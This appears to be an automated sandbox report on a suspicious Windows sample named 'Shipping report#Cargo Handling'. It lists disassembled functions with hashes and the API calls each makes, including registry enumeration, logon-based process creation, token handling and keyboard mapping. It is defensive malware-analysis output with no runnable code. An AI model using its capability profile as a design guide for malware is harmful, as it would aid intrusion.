Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
String ID:
API String ID: 1923757996-0
Opcode ID: b2db41d13796e1a79e244432a38d9533e2a18926aa8fa9624d856992f60f76a0
Instruction ID: 93ba0e8eafdd417ed968d15950baaa83ff2784c3fc668565746f69d7a35c25b5
Opcode Fuzzy Hash: b2db41d13796e1a79e244432a38d9533e2a18926aa8fa9624d856992f60f76a0
Instruction Fuzzy Hash: B1A10331104301AFC728DF64C885FAABBE5AF85318F54895CF5565B2A3CB31ED86CB92

Function 000C61FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,000B82D9,000B82D9,?,?,?,000C644F,00000001,00000001,8BE85006), ref: 000C6258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,000C644F,00000001,00000001,8BE85006,?,?,?), ref: 000C62DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 000C63D8
__freea.LIBCMT ref: 000C63E5

Part of subcall function 000C3820: RtlAllocateHeap.NTDLL(00000000,?,00161444,?,000AFDF5,?,?,0009A976,00000010,00161440,000913FC,?,000913C6,?,00091129), ref: 000C3852

__freea.LIBCMT ref: 000C63EE
__freea.LIBCMT ref: 000C6413

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 955bef1b4deec11152612dca3e2a5524ad60b95444842bac054d6c71737136f8
Instruction ID: bb24015a18b0f5ecd06ff866f4325b2d866c32ea40a64b1d6d08498b1c67c818
Opcode Fuzzy Hash: 955bef1b4deec11152612dca3e2a5524ad60b95444842bac054d6c71737136f8
Instruction Fuzzy Hash: 0751CD72A00256ABEB358FA4CC81FAF7BA9EB44750B14462DF905D6182EB36DD40C6A0

Function 0011BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00099CB3: _wcslen.LIBCMT ref: 00099CBD

Part of subcall function 0011C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0011B6AE,?,?), ref: 0011C9B5
Part of subcall function 0011C998: _wcslen.LIBCMT ref: 0011C9F1
Part of subcall function 0011C998: _wcslen.LIBCMT ref: 0011CA68
Part of subcall function 0011C998: _wcslen.LIBCMT ref: 0011CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0011BCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0011BD25
RegCloseKey.ADVAPI32(00000000), ref: 0011BD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0011BD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0011BDF3
RegCloseKey.ADVAPI32(?), ref: 0011BDFF

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 092576f4daa852050aeff4e32f440e37da8c4b15d14ae8448e2e91da7bca3cf7
Instruction ID: c45fe2e3be79ad1112a2508645883b609188bf84a0d240de7f23982bca24430f
Opcode Fuzzy Hash: 092576f4daa852050aeff4e32f440e37da8c4b15d14ae8448e2e91da7bca3cf7
Instruction Fuzzy Hash: 61818F30208241AFDB18DF64C8C5EAABBE5FF84308F14856CF5554B2A2DB31ED85DB92

Function 000EF7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 000EF7B9
SysAllocString.OLEAUT32(00000001), ref: 000EF860
VariantCopy.OLEAUT32(000EFA64,00000000), ref: 000EF889
VariantClear.OLEAUT32(000EFA64), ref: 000EF8AD
VariantCopy.OLEAUT32(000EFA64,00000000), ref: 000EF8B1
VariantClear.OLEAUT32(?), ref: 000EF8BB

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 0a0300846b07d284b36a8b4681a45d700ad8d3d422401d8079457bcc5fa504f9
Instruction ID: 6a1f2aaf6a921681c305fc60ae03398844f5dc75a76da4545e6233616e8c5274
Opcode Fuzzy Hash: 0a0300846b07d284b36a8b4681a45d700ad8d3d422401d8079457bcc5fa504f9
Instruction Fuzzy Hash: F851C531600392BEDF24AB66D895B7DB3E9EF45310B249466E905FF293DB708C40C796

Function 0010910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00097620: _wcslen.LIBCMT ref: 00097625

Part of subcall function 00096B57: _wcslen.LIBCMT ref: 00096B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 001094E5
_wcslen.LIBCMT ref: 00109506
_wcslen.LIBCMT ref: 0010952D
GetSaveFileNameW.COMDLG32(00000058), ref: 00109585

Strings

X, xrefs: 00109412

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: bbcdf586f0441ee833daa769844d7cb61d749002066bae8631644d65bd54290f
Instruction ID: 663ea00391ecbb933f65bc4e934089463de9ee562c1d41def1f80b59f381be35
Opcode Fuzzy Hash: bbcdf586f0441ee833daa769844d7cb61d749002066bae8631644d65bd54290f
Instruction Fuzzy Hash: B4E19E71608340DFCB24DF25C891AAAB7E0BF85314F05896DF8999B2A3DB71DD05CB92

Function 000A920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 000A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000A9BB2

BeginPaint.USER32(?,?,?), ref: 000A9241
GetWindowRect.USER32(?,?), ref: 000A92A5
ScreenToClient.USER32(?,?), ref: 000A92C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 000A92D3
EndPaint.USER32(?,?,?,?,?), ref: 000A9321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 000E71EA

Part of subcall function 000A9339: BeginPath.GDI32(00000000), ref: 000A9357

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 558d9de46130ae3e4604116892f86eec205704f59066727106c523e30e762f54
Instruction ID: 875456c554ba5b573e32ed65fca415b088c1a731ab035fd5e3a1540ea3f5738a
Opcode Fuzzy Hash: 558d9de46130ae3e4604116892f86eec205704f59066727106c523e30e762f54
Instruction Fuzzy Hash: 5141D031204300AFDB21DF65CC85FBA7BF8EF46324F140669FA54972A2C7719885DBA1

Function 001007EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0010080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00100847
EnterCriticalSection.KERNEL32(?), ref: 00100863
LeaveCriticalSection.KERNEL32(?), ref: 001008DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 001008F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00100921

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 16263b28eb419aa763365fd0409ee5e2f283ead8845132379e37f907219cd3b0
Instruction ID: 930bb66e2114f602cc4ac3b8d769f9f16aa61286454a8795d7dcd875dd494b6e
Opcode Fuzzy Hash: 16263b28eb419aa763365fd0409ee5e2f283ead8845132379e37f907219cd3b0
Instruction Fuzzy Hash: A6415B71900205EFDF15DF94DC85AAA77B8FF08310F1480A5ED049A29BDB70EE65DBA4

Function 001281DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,000EF3AB,00000000,?,?,00000000,?,000E682C,00000004,00000000,00000000), ref: 0012824C
EnableWindow.USER32(00000000,00000000), ref: 00128272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 001282D1
ShowWindow.USER32(00000000,00000004), ref: 001282E5
EnableWindow.USER32(00000000,00000001), ref: 0012830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0012832F

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 09c76e80a05fe264c01f1a629352aa81fbf5105540b4cbc2db58661588745801
Instruction ID: 8fd2f1d2dd65d6d317a3c1e143997887727c7a8e8cf5e5a336e9e5fb3bc55c23
Opcode Fuzzy Hash: 09c76e80a05fe264c01f1a629352aa81fbf5105540b4cbc2db58661588745801
Instruction Fuzzy Hash: 9F41C530602654EFDB25CF14EC99BE47BF1FB0A714F184169E5084B662CB71A8A1CF50

Function 000F4C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 000F4C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 000F4CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 000F4CEA
_wcslen.LIBCMT ref: 000F4D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 000F4D10
_wcsstr.LIBVCRUNTIME ref: 000F4D1A

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: fe680d408b859deedf02b3f000614b0484236b72aba649a619744008a2c7c71c
Instruction ID: b56f1d33f151e65e4761cd36fd74c2bdb57b6d07fe830cb313ec2741e688fe5d
Opcode Fuzzy Hash: fe680d408b859deedf02b3f000614b0484236b72aba649a619744008a2c7c71c
Instruction Fuzzy Hash: 8A213B312042047BEB659B79EC49EBF7BDCDF45750F104039FE05CA592DA71CC41A2A0

Function 0010581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00093AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00093A97,?,?,00092E7F,?,?,?,00000000), ref: 00093AC2

_wcslen.LIBCMT ref: 0010587B
CoInitialize.OLE32(00000000), ref: 00105995
CoCreateInstance.OLE32(0012FCF8,00000000,00000001,0012FB68,?), ref: 001059AE
CoUninitialize.OLE32 ref: 001059CC

Strings

.lnk, xrefs: 00105876, 001058C1, 00105985

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: c1c451a76850cdf6ac7dabc7861aefa390d87f3d788f75c156a529c266494da1
Instruction ID: 3a1b2c90606a4a311ac4b875123fcd0172f8037b120cba35a0391fa22c080425
Opcode Fuzzy Hash: c1c451a76850cdf6ac7dabc7861aefa390d87f3d788f75c156a529c266494da1
Instruction Fuzzy Hash: 48D15271608601DFCB14DF24C480A6BBBE6EF89714F15885DF8899B2A2DB71EC45CF92

Function 000F175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000F0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 000F0FCA
Part of subcall function 000F0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 000F0FD6
Part of subcall function 000F0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 000F0FE5
Part of subcall function 000F0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 000F0FEC
Part of subcall function 000F0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 000F1002

GetLengthSid.ADVAPI32(?,00000000,000F1335), ref: 000F17AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 000F17BA
HeapAlloc.KERNEL32(00000000), ref: 000F17C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 000F17DA
GetProcessHeap.KERNEL32(00000000,00000000,000F1335), ref: 000F17EE
HeapFree.KERNEL32(00000000), ref: 000F17F5

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: bc99ffbb2cc2baaf178b21f2bee962e03879db24d1b9ec0c8ddd460a07d2791c
Instruction ID: 2c2060287fd0f77a43b7a037639ffa412b381c3e422afab672d996edb11f52c6
Opcode Fuzzy Hash: bc99ffbb2cc2baaf178b21f2bee962e03879db24d1b9ec0c8ddd460a07d2791c
Instruction Fuzzy Hash: D1119A31904209FBDB24AFA4CC4ABFF7BB9EB41355F104058F64597610C735A995EBA0

Function 000F14CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 000F14FF
OpenProcessToken.ADVAPI32(00000000), ref: 000F1506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 000F1515
CloseHandle.KERNEL32(00000004), ref: 000F1520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 000F154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 000F1563

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: dcb2dc248bf4f8e3d0221decd5c6ba1d8d2d23dda138d878e1531fbc7818e2cf
Instruction ID: 0a63f0b8d7e536ea2784de0d3eb1a43cc9ae7e32be480c06602064490a2098d7
Opcode Fuzzy Hash: dcb2dc248bf4f8e3d0221decd5c6ba1d8d2d23dda138d878e1531fbc7818e2cf
Instruction Fuzzy Hash: EC11177250024DFFDB218F98DD49BEE7BA9FF48744F144015FA05A2460C3759EA1ABA0

Function 000B3382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,000B3379,000B2FE5), ref: 000B3390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 000B339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 000B33B7
SetLastError.KERNEL32(00000000,?,000B3379,000B2FE5), ref: 000B3409

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: c1897247ec4411c1d9d9aa4528bf3b7ad6d93f08e0bca653b7b655e8dea8266b
Instruction ID: 44f7d1526a1a1b47df1f0e81ed4d51334bf9586af260b027b9b7fa6eb8fcb7f2
Opcode Fuzzy Hash: c1897247ec4411c1d9d9aa4528bf3b7ad6d93f08e0bca653b7b655e8dea8266b
Instruction Fuzzy Hash: 42014733608311FEA6282B74BC86AEB2BD4EB0577A7304229F510852F2EF115E4291C4

Function 000C2D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,000C5686,000D3CD6,?,00000000,?,000C5B6A,?,?,?,?,?,000BE6D1,?,00158A48), ref: 000C2D78
_free.LIBCMT ref: 000C2DAB
_free.LIBCMT ref: 000C2DD3
SetLastError.KERNEL32(00000000,?,?,?,?,000BE6D1,?,00158A48,00000010,00094F4A,?,?,00000000,000D3CD6), ref: 000C2DE0
SetLastError.KERNEL32(00000000,?,?,?,?,000BE6D1,?,00158A48,00000010,00094F4A,?,?,00000000,000D3CD6), ref: 000C2DEC
_abort.LIBCMT ref: 000C2DF2

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: eef85fb58684eb3329fcdf5ca3b19d263ac48483b5f371c1adb9963b45f19f71
Instruction ID: 70e7b6118d9b8572c1c0a34ca71d74d013a3b85ccf7c33624e02995639d47761
Opcode Fuzzy Hash: eef85fb58684eb3329fcdf5ca3b19d263ac48483b5f371c1adb9963b45f19f71
Instruction Fuzzy Hash: 57F0C831505B00BBC6627734BC06F9F2699BFD17A1F25451CF92596DD3EF348C4251A0

Function 00128A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 000A9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000A9693
Part of subcall function 000A9639: SelectObject.GDI32(?,00000000), ref: 000A96A2
Part of subcall function 000A9639: BeginPath.GDI32(?), ref: 000A96B9
Part of subcall function 000A9639: SelectObject.GDI32(?,00000000), ref: 000A96E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00128A4E
LineTo.GDI32(?,00000003,00000000), ref: 00128A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00128A70
LineTo.GDI32(?,00000000,00000003), ref: 00128A80
EndPath.GDI32(?), ref: 00128A90
StrokePath.GDI32(?), ref: 00128AA0

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: feb4ebc0b5f0537a1a3afb072472076a086b690dc03972c3e6f0561a7cb5a4e9
Instruction ID: 95d02c2ca1d5bfc7a5725ee6aca119b92c52dfd33868a31d6b5ea4fd93aab156
Opcode Fuzzy Hash: feb4ebc0b5f0537a1a3afb072472076a086b690dc03972c3e6f0561a7cb5a4e9
Instruction Fuzzy Hash: 4A11C976000119FFEF129F94DC88EAA7F6DEB08354F048012FA199A5A1C771ADA5DFA0

Function 000F51FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 000F5218
GetDeviceCaps.GDI32(00000000,00000058), ref: 000F5229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 000F5230
ReleaseDC.USER32(00000000,00000000), ref: 000F5238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 000F524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 000F5261

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: ac71e9bddd22038fb161b5f9a38c6c060e1a837bea3282278f8b24d5055509f8
Instruction ID: 77a7964ecbde4b4c0b7a42cad44d506563b0ac1d0c177649c212f3aec55c3eae
Opcode Fuzzy Hash: ac71e9bddd22038fb161b5f9a38c6c060e1a837bea3282278f8b24d5055509f8
Instruction Fuzzy Hash: 3E018B75E00708BBEB209BA69C49A5EBFB8EF48752F044165FB04AB681D6709811CBA0

Function 00091BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00091BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 00091BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00091C07
